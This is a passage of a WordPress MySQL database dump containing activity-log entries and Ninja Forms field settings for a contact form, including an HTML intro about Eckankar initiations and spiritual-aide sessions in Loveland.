\"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41148,'2023-11-16 23:56:56','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41149,'2023-11-16 23:57:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41150,'2023-11-16 23:59:12','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41151,'2023-11-17 00:00:27','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41152,'2023-11-17 00:01:42','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41153,'2023-11-17 00:02:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41154,'2023-11-17 00:03:25','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','f685f49a6db57ed696e74a482ca0a316','wp_user'),(41155,'2023-11-17 00:06:25','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41156,'2023-11-17 00:08:39','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41157,'2023-11-17 00:10:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41158,'2023-11-17 00:11:27','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41159,'2023-11-17 00:12:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41160,'2023-11-17 00:22:39','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41161,'2023-11-17 03:37:12','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41162,'2023-11-17 04:17:41','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41163,'2023-11-17 09:44:26','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','886e23f7cac734b46e297bf50138e026','wp'),(41164,'2023-11-17 14:32:12','SimpleUserLogger','info','Logged in','87c0b030fb7ede51bf3f2434cbf46021','wp_user'),(41165,'2023-11-17 14:33:03','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4119cdeeb13a4eb57d3b2b5418148679','wp_user'),(41166,'2023-11-17 14:36:29','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','d811f101d0435a1acff1ef7a15ffabce','wp_user'),(41167,'2023-11-17 14:49:17','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4119cdeeb13a4eb57d3b2b5418148679','wp_user'),(41168,'2023-11-17 14:49:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4119cdeeb13a4eb57d3b2b5418148679','wp_user'),(41169,'2023-11-17 14:59:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4119cdeeb13a4eb57d3b2b5418148679','wp_user'),(41170,'2023-11-17 14:59:20','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','4119cdeeb13a4eb57d3b2b5418148679','wp_user'),(41171,'2023-11-17 16:55:22','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41172,'2023-11-17 17:24:02','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41173,'2023-11-17 17:27:59','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41174,'2023-11-17 17:28:59','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41175,'2023-11-17 17:30:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41176,'2023-11-17 17:30:26','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41177,'2023-11-17 18:08:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7e09cc66a95055380741feb9c3dc2413','wp_user'),(41178,'2023-11-17 18:48:59','SimpleCategoriesLogger','info','Added term \"{term_name}\" in taxonomy \"{term_taxonomy}\"','bc6a4c4aa11dae39691f5e85bb1de961','wp_user'),(41179,'2023-11-17 18:49:18','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','a25db3ae0df7d813a7540f0d6a6f33b4','wp_user'),(41180,'2023-11-17 18:50:21','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41181,'2023-11-17 19:00:50','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41182,'2023-11-17 19:17:20','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(41183,'2023-11-18 19:22:51','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(41184,'2023-11-18 20:34:36','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41185,'2023-11-18 20:36:17','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41186,'2023-11-18 20:36:40','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(41187,'2023-11-18 20:44:54','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','91f72742098547e9f64ef8c70d1f6bb3','wp_user'),(41188,'2023-11-18 20:50:02','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user');
/*!40000 ALTER TABLE `wpcl_simple_history` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_simple_history` with 6256 row(s)
--

--
-- Table structure for table `wpcl_nf3_field_meta`
--

DROP TABLE IF EXISTS `wpcl_nf3_field_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_field_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18593 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_field_meta`
--

LOCK TABLES `wpcl_nf3_field_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_field_meta` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_field_meta` VALUES (1,1,'label_pos','above','label_pos','above'),(2,1,'required','1','required','1'),(3,1,'order','1','order','1'),(4,1,'placeholder','','placeholder',''),(5,1,'default','','default',''),(6,1,'wrapper_class','','wrapper_class',''),(7,1,'element_class','','element_class',''),(8,1,'objectType','Field','objectType','Field'),(9,1,'objectDomain','fields','objectDomain','fields'),(10,1,'editActive','','editActive',''),(11,1,'container_class','','container_class',''),(12,1,'input_limit','','input_limit',''),(13,1,'input_limit_type','characters','input_limit_type','characters'),(14,1,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(15,1,'manual_key','','manual_key',''),(16,1,'disable_input','','disable_input',''),(17,1,'admin_label','','admin_label',''),(18,1,'help_text','','help_text',''),(19,1,'desc_text','','desc_text',''),(20,1,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(21,1,'mask','','mask',''),(22,1,'custom_mask','','custom_mask',''),(23,1,'wrap_styles_background-color','','wrap_styles_background-color',''),(24,1,'wrap_styles_border','','wrap_styles_border',''),(25,1,'wrap_styles_border-style','','wrap_styles_border-style',''),(26,1,'wrap_styles_border-color','','wrap_styles_border-color',''),(27,1,'wrap_styles_color','','wrap_styles_color',''),(28,1,'wrap_styles_height','','wrap_styles_height',''),(29,1,'wrap_styles_width','','wrap_styles_width',''),(30,1,'wrap_styles_font-size','','wrap_styles_font-size',''),(31,1,'wrap_styles_margin','','wrap_styles_margin',''),(32,1,'wrap_styles_padding','','wrap_styles_padding',''),(33,1,'wrap_styles_display','','wrap_styles_display',''),(34,1,'wrap_styles_float','','wrap_styles_float',''),(35,1,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(36,1,'wrap_styles_advanced','','wrap_styles_advanced',''),(37,1,'label_styles_background-color','','label_styles_background-color',''),(38,1,'label_styles_border','','label_styles_border',''),(39,1,'label_styles_border-style','','label_styles_border-style',''),(40,1,'label_styles_border-color','','label_styles_border-color',''),(41,1,'label_styles_color','','label_styles_color',''),(42,1,'label_styles_height','','label_styles_height',''),(43,1,'label_styles_width','','label_styles_width',''),(44,1,'label_styles_font-size','','label_styles_font-size',''),(45,1,'label_styles_margin','','label_styles_margin',''),(46,1,'label_styles_padding','','label_styles_padding',''),(47,1,'label_styles_display','','label_styles_display',''),(48,1,'label_styles_float','','label_styles_float',''),(49,1,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(50,1,'label_styles_advanced','','label_styles_advanced',''),(51,1,'element_styles_background-color','','element_styles_background-color',''),(52,1,'element_styles_border','','element_styles_border',''),(53,1,'element_styles_border-style','','element_styles_border-style',''),(54,1,'element_styles_border-color','','element_styles_border-color',''),(55,1,'element_styles_color','','element_styles_color',''),(56,1,'element_styles_height','','element_styles_height',''),(57,1,'element_styles_width','','element_styles_width',''),(58,1,'element_styles_font-size','','element_styles_font-size',''),(59,1,'element_styles_margin','','element_styles_margin',''),(60,1,'element_styles_padding','','element_styles_padding',''),(61,1,'element_styles_display','','element_styles_display',''),(62,1,'element_styles_float','','element_styles_float',''),(63,1,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(64,1,'element_styles_advanced','','element_styles_advanced',''),(65,1,'cellcid','c3277','cellcid','c3277'),(66,2,'label_pos','above','label_pos','above'),(67,2,'required','1','required','1'),(68,2,'order','2','order','2'),(69,2,'placeholder','','placeholder',''),(70,2,'default','','default',''),(71,2,'wrapper_class','','wrapper_class',''),(72,2,'element_class','','element_class',''),(73,2,'objectType','Field','objectType','Field'),(74,2,'objectDomain','fields','objectDomain','fields'),(75,2,'editActive','','editActive',''),(76,2,'container_class','','container_class',''),(77,2,'admin_label','','admin_label',''),(78,2,'help_text','','help_text',''),(79,2,'desc_text','','desc_text',''),(80,2,'wrap_styles_background-color','','wrap_styles_background-color',''),(81,2,'wrap_styles_border','','wrap_styles_border',''),(82,2,'wrap_styles_border-style','','wrap_styles_border-style',''),(83,2,'wrap_styles_border-color','','wrap_styles_border-color',''),(84,2,'wrap_styles_color','','wrap_styles_color',''),(85,2,'wrap_styles_height','','wrap_styles_height',''),(86,2,'wrap_styles_width','','wrap_styles_width',''),(87,2,'wrap_styles_font-size','','wrap_styles_font-size',''),(88,2,'wrap_styles_margin','','wrap_styles_margin',''),(89,2,'wrap_styles_padding','','wrap_styles_padding',''),(90,2,'wrap_styles_display','','wrap_styles_display',''),(91,2,'wrap_styles_float','','wrap_styles_float',''),(92,2,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(93,2,'wrap_styles_advanced','','wrap_styles_advanced',''),(94,2,'label_styles_background-color','','label_styles_background-color',''),(95,2,'label_styles_border','','label_styles_border',''),(96,2,'label_styles_border-style','','label_styles_border-style',''),(97,2,'label_styles_border-color','','label_styles_border-color',''),(98,2,'label_styles_color','','label_styles_color',''),(99,2,'label_styles_height','','label_styles_height',''),(100,2,'label_styles_width','','label_styles_width',''),(101,2,'label_styles_font-size','','label_styles_font-size',''),(102,2,'label_styles_margin','','label_styles_margin',''),(103,2,'label_styles_padding','','label_styles_padding',''),(104,2,'label_styles_display','','label_styles_display',''),(105,2,'label_styles_float','','label_styles_float',''),(106,2,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(107,2,'label_styles_advanced','','label_styles_advanced',''),(108,2,'element_styles_background-color','','element_styles_background-color',''),(109,2,'element_styles_border','','element_styles_border',''),(110,2,'element_styles_border-style','','element_styles_border-style',''),(111,2,'element_styles_border-color','','element_styles_border-color',''),(112,2,'element_styles_color','','element_styles_color',''),(113,2,'element_styles_height','','element_styles_height',''),(114,2,'element_styles_width','','element_styles_width',''),(115,2,'element_styles_font-size','','element_styles_font-size',''),(116,2,'element_styles_margin','','element_styles_margin',''),(117,2,'element_styles_padding','','element_styles_padding',''),(118,2,'element_styles_display','','element_styles_display',''),(119,2,'element_styles_float','','element_styles_float',''),(120,2,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(121,2,'element_styles_advanced','','element_styles_advanced',''),(122,2,'cellcid','c3281','cellcid','c3281'),(123,3,'label_pos','above','label_pos','above'),(124,3,'required','1','required','1'),(125,3,'order','3','order','3'),(126,3,'placeholder','','placeholder',''),(127,3,'default','','default',''),(128,3,'wrapper_class','','wrapper_class',''),(129,3,'element_class','','element_class',''),(130,3,'objectType','Field','objectType','Field'),(131,3,'objectDomain','fields','objectDomain','fields'),(132,3,'editActive','','editActive',''),(133,3,'container_class','','container_class',''),(134,3,'input_limit','','input_limit',''),(135,3,'input_limit_type','characters','input_limit_type','characters'),(136,3,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(137,3,'manual_key','','manual_key',''),(138,3,'disable_input','','disable_input',''),(139,3,'admin_label','','admin_label',''),(140,3,'help_text','','help_text',''),(141,3,'desc_text','','desc_text',''),(142,3,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(143,3,'textarea_rte','','textarea_rte',''),(144,3,'disable_rte_mobile','','disable_rte_mobile',''),(145,3,'textarea_media','','textarea_media',''),(146,3,'wrap_styles_background-color','','wrap_styles_background-color',''),(147,3,'wrap_styles_border','','wrap_styles_border',''),(148,3,'wrap_styles_border-style','','wrap_styles_border-style',''),(149,3,'wrap_styles_border-color','','wrap_styles_border-color',''),(150,3,'wrap_styles_color','','wrap_styles_color',''),(151,3,'wrap_styles_height','','wrap_styles_height',''),(152,3,'wrap_styles_width','','wrap_styles_width',''),(153,3,'wrap_styles_font-size','','wrap_styles_font-size',''),(154,3,'wrap_styles_margin','','wrap_styles_margin',''),(155,3,'wrap_styles_padding','','wrap_styles_padding',''),(156,3,'wrap_styles_display','','wrap_styles_display',''),(157,3,'wrap_styles_float','','wrap_styles_float',''),(158,3,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(159,3,'wrap_styles_advanced','','wrap_styles_advanced',''),(160,3,'label_styles_background-color','','label_styles_background-color',''),(161,3,'label_styles_border','','label_styles_border',''),(162,3,'label_styles_border-style','','label_styles_border-style',''),(163,3,'label_styles_border-color','','label_styles_border-color',''),(164,3,'label_styles_color','','label_styles_color',''),(165,3,'label_styles_height','','label_styles_height',''),(166,3,'label_styles_width','','label_styles_width',''),(167,3,'label_styles_font-size','','label_styles_font-size',''),(168,3,'label_styles_margin','','label_styles_margin',''),(169,3,'label_styles_padding','','label_styles_padding',''),(170,3,'label_styles_display','','label_styles_display',''),(171,3,'label_styles_float','','label_styles_float',''),(172,3,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(173,3,'label_styles_advanced','','label_styles_advanced',''),(174,3,'element_styles_background-color','','element_styles_background-color',''),(175,3,'element_styles_border','','element_styles_border',''),(176,3,'element_styles_border-style','','element_styles_border-style',''),(177,3,'element_styles_border-color','','element_styles_border-color',''),(178,3,'element_styles_color','','element_styles_color',''),(179,3,'element_styles_height','','element_styles_height',''),(180,3,'element_styles_width','','element_styles_width',''),(181,3,'element_styles_font-size','','element_styles_font-size',''),(182,3,'element_styles_margin','','element_styles_margin',''),(183,3,'element_styles_padding','','element_styles_padding',''),(184,3,'element_styles_display','','element_styles_display',''),(185,3,'element_styles_float','','element_styles_float',''),(186,3,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(187,3,'element_styles_advanced','','element_styles_advanced',''),(188,3,'cellcid','c3284','cellcid','c3284'),(189,4,'processing_label','Processing','processing_label','Processing'),(190,4,'order','5','order','5'),(191,4,'objectType','Field','objectType','Field'),(192,4,'objectDomain','fields','objectDomain','fields'),(193,4,'editActive','','editActive',''),(194,4,'container_class','','container_class',''),(195,4,'element_class','','element_class',''),(196,4,'wrap_styles_background-color','','wrap_styles_background-color',''),(197,4,'wrap_styles_border','','wrap_styles_border',''),(198,4,'wrap_styles_border-style','','wrap_styles_border-style',''),(199,4,'wrap_styles_border-color','','wrap_styles_border-color',''),(200,4,'wrap_styles_color','','wrap_styles_color',''),(201,4,'wrap_styles_height','','wrap_styles_height',''),(202,4,'wrap_styles_width','','wrap_styles_width',''),(203,4,'wrap_styles_font-size','','wrap_styles_font-size',''),(204,4,'wrap_styles_margin','','wrap_styles_margin',''),(205,4,'wrap_styles_padding','','wrap_styles_padding',''),(206,4,'wrap_styles_display','','wrap_styles_display',''),(207,4,'wrap_styles_float','','wrap_styles_float',''),(208,4,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(209,4,'wrap_styles_advanced','','wrap_styles_advanced',''),(210,4,'label_styles_background-color','','label_styles_background-color',''),(211,4,'label_styles_border','','label_styles_border',''),(212,4,'label_styles_border-style','','label_styles_border-style',''),(213,4,'label_styles_border-color','','label_styles_border-color',''),(214,4,'label_styles_color','','label_styles_color',''),(215,4,'label_styles_height','','label_styles_height',''),(216,4,'label_styles_width','','label_styles_width',''),(217,4,'label_styles_font-size','','label_styles_font-size',''),(218,4,'label_styles_margin','','label_styles_margin',''),(219,4,'label_styles_padding','','label_styles_padding',''),(220,4,'label_styles_display','','label_styles_display',''),(221,4,'label_styles_float','','label_styles_float',''),(222,4,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(223,4,'label_styles_advanced','','label_styles_advanced',''),(224,4,'element_styles_background-color','','element_styles_background-color',''),(225,4,'element_styles_border','','element_styles_border',''),(226,4,'element_styles_border-style','','element_styles_border-style',''),(227,4,'element_styles_border-color','','element_styles_border-color',''),(228,4,'element_styles_color','','element_styles_color',''),(229,4,'element_styles_height','','element_styles_height',''),(230,4,'element_styles_width','','element_styles_width',''),(231,4,'element_styles_font-size','','element_styles_font-size',''),(232,4,'element_styles_margin','','element_styles_margin',''),(233,4,'element_styles_padding','','element_styles_padding',''),(234,4,'element_styles_display','','element_styles_display',''),(235,4,'element_styles_float','','element_styles_float',''),(236,4,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(237,4,'element_styles_advanced','','element_styles_advanced',''),(238,4,'submit_element_hover_styles_background-color','','submit_element_hover_styles_background-color',''),(239,4,'submit_element_hover_styles_border','','submit_element_hover_styles_border',''),(240,4,'submit_element_hover_styles_border-style','','submit_element_hover_styles_border-style',''),(241,4,'submit_element_hover_styles_border-color','','submit_element_hover_styles_border-color',''),(242,4,'submit_element_hover_styles_color','','submit_element_hover_styles_color',''),(243,4,'submit_element_hover_styles_height','','submit_element_hover_styles_height',''),(244,4,'submit_element_hover_styles_width','','submit_element_hover_styles_width',''),(245,4,'submit_element_hover_styles_font-size','','submit_element_hover_styles_font-size',''),(246,4,'submit_element_hover_styles_margin','','submit_element_hover_styles_margin',''),(247,4,'submit_element_hover_styles_padding','','submit_element_hover_styles_padding',''),(248,4,'submit_element_hover_styles_display','','submit_element_hover_styles_display',''),(249,4,'submit_element_hover_styles_float','','submit_element_hover_styles_float',''),(250,4,'submit_element_hover_styles_show_advanced_css','0','submit_element_hover_styles_show_advanced_css','0'),(251,4,'submit_element_hover_styles_advanced','','submit_element_hover_styles_advanced',''),(252,4,'cellcid','c3287','cellcid','c3287'),(253,1,'field_label','Name','field_label','Name'),(254,1,'field_key','name','field_key','name'),(255,2,'field_label','Email','field_label','Email'),(256,2,'field_key','email','field_key','email'),(257,3,'field_label','Message','field_label','Message'),(258,3,'field_key','message','field_key','message'),(259,4,'field_label','Submit','field_label','Submit'),(260,4,'field_key','submit','field_key','submit'),(261,5,'objectType','Field','objectType','Field'),(262,5,'objectDomain','fields','objectDomain','fields'),(263,5,'editActive','','editActive',''),(264,5,'order','1','order','1'),(265,5,'type','html','type','html'),(266,5,'label','Text','label','Text'),(267,5,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(268,5,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(269,5,'desc_el','div','desc_el','div'),(270,5,'show_desc','0','show_desc','0'),(271,5,'desc_pos','none','desc_pos','none'),(272,5,'desc_text','','desc_text',''),(273,5,'element_class','','element_class',''),(274,5,'default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(275,5,'key','html_141','key','html_141'),(276,5,'container_class','','container_class',''),(277,5,'drawerDisabled','','drawerDisabled',''),(278,5,'parent_id','2','parent_id','2'),(279,6,'objectType','Field','objectType','Field'),(280,6,'objectDomain','fields','objectDomain','fields'),(281,6,'editActive','','editActive',''),(282,6,'order','2','order','2'),(283,6,'type','textbox','type','textbox'),(284,6,'def_id','6','def_id','6'),(285,6,'label','First Name','label','First Name'),(286,6,'label_pos','above','label_pos','above'),(287,6,'mask','','mask',''),(288,6,'datepicker','0','datepicker','0'),(289,6,'first_name','1','first_name','1'),(290,6,'last_name','0','last_name','0'),(291,6,'from_name','0','from_name','0'),(292,6,'user_info_field_group','1','user_info_field_group','1'),(293,6,'show_help','0','show_help','0'),(294,6,'help_text','','help_text',''),(295,6,'calc_auto_include','0','calc_auto_include','0'),(296,6,'calc_option','0','calc_option','0'),(297,6,'placeholder','','placeholder',''),(298,6,'user_address_1','','user_address_1',''),(299,6,'user_address_2','','user_address_2',''),(300,6,'user_city','','user_city',''),(301,6,'user_zip','','user_zip',''),(302,6,'user_phone','','user_phone',''),(303,6,'user_email','','user_email',''),(304,6,'disable_input','0','disable_input','0'),(305,6,'input_limit','','input_limit',''),(306,6,'input_limit_type','char','input_limit_type','char'),(307,6,'input_limit_msg','','input_limit_msg',''),(308,6,'user_state','0','user_state','0'),(309,6,'autocomplete_off','0','autocomplete_off','0'),(310,6,'num_sort','0','num_sort','0'),(311,6,'admin_label','','admin_label',''),(312,6,'user_info_field_group_name','','user_info_field_group_name',''),(313,6,'user_info_field_group_custom','','user_info_field_group_custom',''),(314,6,'show_desc','0','show_desc','0'),(315,6,'desc_pos','none','desc_pos','none'),(316,6,'desc_text','','desc_text',''),(317,6,'element_class','','element_class',''),(318,6,'required','1','required','1'),(319,6,'key','textbox_142','key','textbox_142'),(320,6,'default','','default',''),(321,6,'container_class','one-half first','container_class','one-half first'),(322,6,'manual_key','','manual_key',''),(323,6,'custom_mask','','custom_mask',''),(324,6,'parent_id','2','parent_id','2'),(325,7,'objectType','Field','objectType','Field'),(326,7,'objectDomain','fields','objectDomain','fields'),(327,7,'editActive','','editActive',''),(328,7,'order','3','order','3'),(329,7,'type','lastname','type','lastname'),(330,7,'def_id','7','def_id','7'),(331,7,'label','Last Name','label','Last Name'),(332,7,'label_pos','above','label_pos','above'),(333,7,'mask','','mask',''),(334,7,'datepicker','0','datepicker','0'),(335,7,'first_name','0','first_name','0'),(336,7,'from_name','0','from_name','0'),(337,7,'user_info_field_group','1','user_info_field_group','1'),(338,7,'show_help','0','show_help','0'),(339,7,'help_text','','help_text',''),(340,7,'calc_auto_include','0','calc_auto_include','0'),(341,7,'calc_option','0','calc_option','0'),(342,7,'placeholder','','placeholder',''),(343,7,'user_address_1','','user_address_1',''),(344,7,'user_address_2','','user_address_2',''),(345,7,'user_city','','user_city',''),(346,7,'user_zip','','user_zip',''),(347,7,'user_phone','','user_phone',''),(348,7,'user_email','','user_email',''),(349,7,'disable_input','0','disable_input','0'),(350,7,'input_limit','','input_limit',''),(351,7,'input_limit_type','char','input_limit_type','char'),(352,7,'input_limit_msg','','input_limit_msg',''),(353,7,'user_state','0','user_state','0'),(354,7,'autocomplete_off','0','autocomplete_off','0'),(355,7,'num_sort','0','num_sort','0'),(356,7,'admin_label','','admin_label',''),(357,7,'user_info_field_group_name','','user_info_field_group_name',''),(358,7,'user_info_field_group_custom','','user_info_field_group_custom',''),(359,7,'show_desc','0','show_desc','0'),(360,7,'desc_pos','none','desc_pos','none'),(361,7,'desc_text','','desc_text',''),(362,7,'element_class','','element_class',''),(363,7,'required','1','required','1'),(364,7,'key','lastname_143','key','lastname_143'),(365,7,'default','','default',''),(366,7,'container_class','one-half','container_class','one-half'),(367,7,'parent_id','2','parent_id','2'),(368,8,'objectType','Field','objectType','Field'),(369,8,'objectDomain','fields','objectDomain','fields'),(370,8,'editActive','','editActive',''),(371,8,'order','4','order','4'),(372,8,'type','email','type','email'),(373,8,'def_id','14','def_id','14'),(374,8,'label','Email','label','Email'),(375,8,'label_pos','above','label_pos','above'),(376,8,'mask','','mask',''),(377,8,'datepicker','0','datepicker','0'),(378,8,'first_name','0','first_name','0'),(379,8,'last_name','0','last_name','0'),(380,8,'from_name','0','from_name','0'),(381,8,'user_address_1','0','user_address_1','0'),(382,8,'user_address_2','0','user_address_2','0'),(383,8,'user_city','0','user_city','0'),(384,8,'user_zip','0','user_zip','0'),(385,8,'user_phone','0','user_phone','0'),(386,8,'user_info_field_group','1','user_info_field_group','1'),(387,8,'show_help','0','show_help','0'),(388,8,'help_text','','help_text',''),(389,8,'calc_auto_include','0','calc_auto_include','0'),(390,8,'calc_option','0','calc_option','0'),(391,8,'placeholder','','placeholder',''),(392,8,'disable_input','0','disable_input','0'),(393,8,'input_limit','','input_limit',''),(394,8,'input_limit_type','char','input_limit_type','char'),(395,8,'input_limit_msg','','input_limit_msg',''),(396,8,'user_state','0','user_state','0'),(397,8,'autocomplete_off','0','autocomplete_off','0'),(398,8,'num_sort','0','num_sort','0'),(399,8,'admin_label','','admin_label',''),(400,8,'user_info_field_group_name','','user_info_field_group_name',''),(401,8,'user_info_field_group_custom','','user_info_field_group_custom',''),(402,8,'show_desc','0','show_de